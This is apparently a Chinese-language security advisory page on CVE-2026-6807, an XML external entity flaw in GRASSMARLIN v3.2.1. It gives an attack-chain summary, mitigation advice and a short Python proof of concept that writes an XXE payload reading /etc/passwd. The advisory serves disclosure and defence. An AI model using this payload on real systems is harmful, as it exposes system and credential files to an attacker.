CVE-2026-6807 CVSS 5.5 中危

CVE-2026-6807 GRASSMARLIN XML解析信息泄露漏洞

披露日期: 2026-04-28

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-6807

漏洞类型

XML注入

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

GRASSMARLIN

漏洞概述

GRASSMARLIN v3.2.1版本中存在一个安全漏洞，该漏洞源于XML解析过程加固不足。攻击者可以通过精心构造的会话数据触发XML输入处理不当，从而导致敏感信息意外泄露。该漏洞的CVSS评分为5.5，属于中危级别，需要本地低权限即可利用。

技术细节

该漏洞位于GRASSMARLIN v3.2.1的会话数据处理模块。由于应用程序在解析XML输入时未实施足够的安全加固措施（例如未禁用外部实体解析），本地低权限攻击者可以通过提交包含恶意XML实体的会话数据来利用此漏洞。当解析器处理这些精心制作的数据时，可能会读取系统上的敏感文件（如配置文件或凭证）并将其泄露给攻击者。虽然该漏洞不直接影响系统的完整性和可用性，但其高机密性影响允许攻击者获取关键信息，为后续攻击提供基础。

攻击链分析

STEP 1

访问系统

攻击者获得对运行GRASSMARLIN v3.2.1系统的本地低权限访问权限。

STEP 2

构造恶意数据

攻击者创建包含恶意XML外部实体（XXE）载荷的会话数据文件。

STEP 3

触发解析

攻击者诱导应用程序加载并解析该恶意的会话数据文件。

STEP 4

信息泄露

应用程序的XML解析器处理恶意实体，读取本地敏感文件并将其内容在响应中泄露给攻击者。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import os

# Simulating crafted session data containing an XXE payload
# This payload attempts to read a sensitive file (e.g., /etc/passwd)
xml_payload = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<session>
    <user>&xxe;</user>
    <action>login</action>
</session>
"""

# Save the crafted payload to a file that GRASSMARLIN might process as session data
with open('malicious_session.xml', 'w') as f:
    f.write(xml_payload)

print("Malicious session data generated: malicious_session.xml")
print("If processed by a vulnerable GRASSMARLIN instance, this may expose sensitive file contents.")

影响范围

GRASSMARLIN 3.2.1

防御指南

临时缓解措施

建议立即限制本地用户权限，并避免打开来源不明的会话文件。在官方补丁发布前，可通过配置系统防火墙或应用程序设置，禁用XML文档类型定义（DTD）的处理，以阻断XXE攻击向量。同时，应密切监控系统日志，检查是否有异常的文件读取行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表